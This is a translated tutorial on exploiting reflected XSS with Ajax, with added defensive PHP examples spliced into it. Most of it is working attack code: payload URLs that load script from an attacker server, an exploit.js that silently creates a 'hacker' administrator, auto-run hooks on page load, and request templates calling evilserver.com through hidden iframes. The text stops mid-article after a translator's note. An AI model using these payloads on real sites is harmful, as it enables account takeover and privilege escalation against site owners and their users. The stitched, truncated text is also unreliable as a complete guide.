Use advanced Ajax XSS Technology

Source: Internet
Author: User

Control your heart from evil baboons

0. Description
1. Using xss to hijack javascript
2. Remotely calling the hijacking code
3. Using Ajax to do more: an advanced example based on XMLHttpRequest
4. Automatic operation
5. Influence on Ajax sites
6. Potential for improving general techniques
7. magic_quotes_gpc problems
8. Permanent xss
9. Cooperation between xss and SQL injection
 9.1. xss vulnerability
 9.2. SQL injection vulnerability
 9.3. Writing the exploitation tool
 9.4. Attack!
A. Solving xss problems
B. Conclusion
0. Description:
Most people think the xss vulnerability is not powerful, for two reasons. One is that you can supposedly only use it to steal cookies; the other is the (mistaken) belief that it requires the target to click a specific link or visit a specific website. In this article I will show that xss can do much more than steal cookies, even if you still need the target to click a specific link. A new technology called Ajax is spreading across the web. Ajax lets you use javascript to send HTTP requests. A simple website without Ajax works like this:
Client --request--> server --response--> returned content --> client
While with Ajax it looks like this:
Client --request--> javascript --> server --response--> data --> javascript processing
I will start by showing how to use the xss vulnerability to hijack javascript functions. Further on we will see the impact of a website's over-trust in javascript and the various possibilities this technique opens up.
Before we start, you must do the following:
Configure magic_quotes_gpc = off
Allow javascript execution in your browser
 Download these examples from my website (which ads like this ??)
1. Using xss to hijack javascript
Let's start with a clear example. This is a php web page with an xss vulnerability:
<html>
<head>
<title>Javascript Hijack with XSS</title>
<script type="text/javascript" src="script.js"></script>
</head>
<body>
<?php echo $_GET["xss"]; ?>
<input type="submit" onClick="javascript:Hello()" value="Say Hello"/>
</body>
</html>
There is also a javascript script file with the code:
function Hello()
{
    alert("Hi there");
}
This is very simple: we have a web page containing a button, and when you click it a dialog box saying "Hi there" pops up.
Now submit this URL:
http://[host]/?xss=<script>function Hello(){alert("hijacked");}</script>
OK. Now click the button. What happens? We do not get "Hi there" but "hijacked"! This means we can use the xss vulnerability to hijack javascript code: when the user calls a function, our code runs instead of the original.
Well, we now know how to redefine javascript functions from the URL. But if you need to redefine many functions, doing it through the URL will drive you mad. So let's create a new javascript file (hijack.js) that contains everything we need:
function Hello()
{
    alert("Hijack from remote");
}
Then we submit a URL like this:
http://[host]/?xss=<script type="text/javascript" src="http://[edevil server]/hijack.js"></script>
What happens when we click the button again? "Hijack from remote"! So now we know how to hijack javascript functions properly.
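For contrast, here is the same page with the two defences the article's outline promises under "Solving xss problems". This is an added example, not the article's code; it keeps the article's file names (script.js, Hello()), and the way script.js attaches the click handler is an assumption.

```php
<?php
// Added example, not the article's code: the vulnerable page from this section
// with output encoding and a Content Security Policy added. Assumes the
// article's file names (script.js, the Hello() function); how script.js
// attaches the handler is an assumption.
declare(strict_types=1);

// Defence 1: only scripts served from this origin may run. Without
// 'unsafe-inline' the inline payload from the URL
// (<script>function Hello(){...}</script>) is refused, and the remote payload
// (<script src="http://[edevil server]/hijack.js">) is refused as a foreign origin.
header("Content-Security-Policy: script-src 'self'; object-src 'none'; base-uri 'none'");
header('X-Content-Type-Options: nosniff');
header('Content-Type: text/html; charset=UTF-8');

// Defence 2 (the root-cause fix): HTML-encode untrusted input before it is
// written into the page, so "<script>" reaches the browser as text, not markup.
// This does not depend on magic_quotes_gpc, which the article switches off.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$xss = (isset($_GET['xss']) && is_string($_GET['xss'])) ? $_GET['xss'] : '';
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Javascript Hijack with XSS (fixed)</title>
<script type="text/javascript" src="script.js"></script>
</head>
<body>
<!-- still reflected, but as encoded text rather than markup -->
<?php echo h($xss); ?>
<!-- The CSP above also blocks inline event handlers, so the onClick attribute
     is gone; script.js is assumed to attach the handler once the page has
     loaded: document.getElementById('say-hello').addEventListener('click', Hello); -->
<input type="submit" id="say-hello" value="Say Hello"/>
</body>
</html>
```

With both defences the browser's console reports the refused script rather than executing it; the encoding alone is enough to stop this section's two payloads, the policy is defence in depth for any reflection point that was missed.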
2. Using Ajax to do more: an advanced example based on XMLHttpRequest
To demonstrate this technique I wrote a small teaching example; download it from my website. I will use some of its code and explain it. It is a simple administration area where an administrator can add new administrators or publish messages on a blog. The page add_message.php?author=[xss] has an xss vulnerability, which we will use for the attack!
I have written a lightweight exploit (exploit.js) that hijacks the page's javascript functions. The code is:
function createRequest()
{
    var xmlHttp;
    if (window.ActiveXObject)
    {
        // older Internet Explorer
        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
    else if (window.XMLHttpRequest)
    {
        xmlHttp = new XMLHttpRequest();
    }

    return xmlHttp;
}

// replaces the page's own validateForm(), which runs when the form is submitted
function validateForm()
{
    var xmlHttp;

    xmlHttp = createRequest();
    var url = "add_admin.php?login=hacker&password=hacker&email=hacker";
    xmlHttp.open("GET", url, true);   // same origin, so the administrator's session cookies go with it
    xmlHttp.send(null);
    document.location = "add_message.php";
}
This attack requires the administrator to visit this URL:
http://[host]/add_message.php?author=<script type="text/javascript" src="http://[edevil server]/exploit.js"></script>
When he clicks the submit button, our malicious code adds a user with login and password "hacker" to the database. We made the target run our malicious code! But he still has to click the button...
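The request the exploit above sends succeeds only because add_admin.php changes state on a plain GET with nothing but the session cookie as proof of intent. Below is an added example of an add_admin.php that refuses that request; it is not the article's code. The field names (login, password, email) are the article's; $pdo (from an assumed db.php), the admins table and the session keys are assumptions.

```php
<?php
// Added example, not the article's code: an add_admin.php that no longer accepts
// the request the exploit above sends. Field names (login, password, email) are
// the article's; $pdo, the admins table and the session keys are assumptions.
declare(strict_types=1);
session_start();
require 'db.php'; // assumed to define $pdo (a PDO connection)

function refuse(int $status, string $reason): void
{
    http_response_code($status);
    error_log(sprintf('add_admin refused (%s) from %s', $reason, $_SERVER['REMOTE_ADDR'] ?? '-'));
    exit;
}

// 1. State changes only on POST: the exploit's xmlHttp.open("GET", ...) is refused.
if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
    refuse(405, 'method not POST');
}
// 2. Only an authenticated administrator may add administrators.
if (empty($_SESSION['admin_id'])) {
    refuse(403, 'not authenticated');
}
// 3. Anti-CSRF token bound to the session, compared in constant time.
$token = $_POST['csrf_token'] ?? '';
if (!is_string($token) || empty($_SESSION['csrf_token'])
    || !hash_equals($_SESSION['csrf_token'], $token)) {
    refuse(403, 'bad csrf token');
}
// 4. Validate the fields the exploit fills with "hacker".
$login    = trim((string)($_POST['login'] ?? ''));
$password = (string)($_POST['password'] ?? '');
$email    = trim((string)($_POST['email'] ?? ''));
if (!preg_match('/^[A-Za-z0-9_]{3,32}$/', $login) || strlen($password) < 12
    || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
    refuse(400, 'invalid fields');
}
// 5. Prepared statement (no SQL injection) and a hashed password, never clear text.
$stmt = $pdo->prepare(
    'INSERT INTO admins (login, password_hash, email, created_by) VALUES (?, ?, ?, ?)'
);
$stmt->execute([$login, password_hash($password, PASSWORD_DEFAULT), $email, (int)$_SESSION['admin_id']]);
// 6. Audit trail: who created which account.
error_log(sprintf('admin "%s" created by admin_id=%d', $login, $_SESSION['admin_id']));
header('Location: add_message.php', true, 303);
```

Because the article's script runs inside the administrator's own origin, it could in principle read the token from a form on the page and send a POST itself, so steps 1 to 3 stop the GET exploit shown above and classic cross-site forgery but do not replace the fix for the reflected author parameter in add_message.php, which is the output encoding shown in the previous section. The refused-request log lines also give a defender something to alert on when an administrator's session suddenly issues GETs against add_admin.php.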
3. Automatic Execution
In the example above the target always has to click a button to complete the attack. Here is a solution:
window.onload = function initHijack()
{
    [...]
}
Now the attack completes as soon as the target follows the link. You can also run javascript code when the target leaves the page:
window.onunload = function initHijack()
{
    [...]
}
4. Ajax code template
Here is some basic sample code for writing a javascript exploit (http is an XMLHttpRequest object, for example from the createRequest() function above):
GET request:
var http = createRequest();
var url = "page.php?param1=value1&param2=value2";
http.open("GET", url, true);
http.onreadystatechange = function() {
    if (http.readyState == 4 && http.status == 200) {
        alert(http.responseText);
    }
};
http.send(null);
POST request:
var http = createRequest();
var url = "page.php";
var params = "param1=value1&param2=value2";
http.open("POST", url, true);

http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// Content-length and Connection are forbidden request headers: browsers set them
// themselves and silently ignore these two calls
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");

http.onreadystatechange = function() {
    if (http.readyState == 4 && http.status == 200) {
        alert(http.responseText);
    }
};
http.send(params);
Tip: a POST request must set some HTTP headers. You can also use open() to send a GET request:
function RemoteGetWithOpen()
{
    open("http://www.evilserver.com/ajaxhack/evil.php?param1=value1&param2=value2");
}
Using an iframe to send GET requests:
function CreateArbitraryIframe()
{
    // <iframe src="http://www.google.com/" style="visibility: hidden;" name="exploit">
    var objBody = document.getElementsByTagName("body")[0];
    var objIframe = document.createElement("iframe");
    // we set the "src" attribute
    var attribut_src = document.createAttribute("src");
    attribut_src.nodeValue = "http://www.evilserver.com/[...]";
    objIframe.setAttributeNode(attribut_src);
    // we hide it
    var attribut_visibility = document.createAttribute("style");
    attribut_visibility.nodeValue = "visibility: hidden;";
    objIframe.setAttributeNode(attribut_visibility);
    // we give our frame a name
    var attribut_name = document.createAttribute("name");
    attribut_name.nodeValue = "exploit";
    objIframe.setAttributeNode(attribut_name);
    objBody.appendChild(objIframe);
}
5. Influence on Ajax sites. (Translator's note: because the text was copied into a plain-text structure the remainder is too messy, and the translation stops here; my apologies.)
6. We
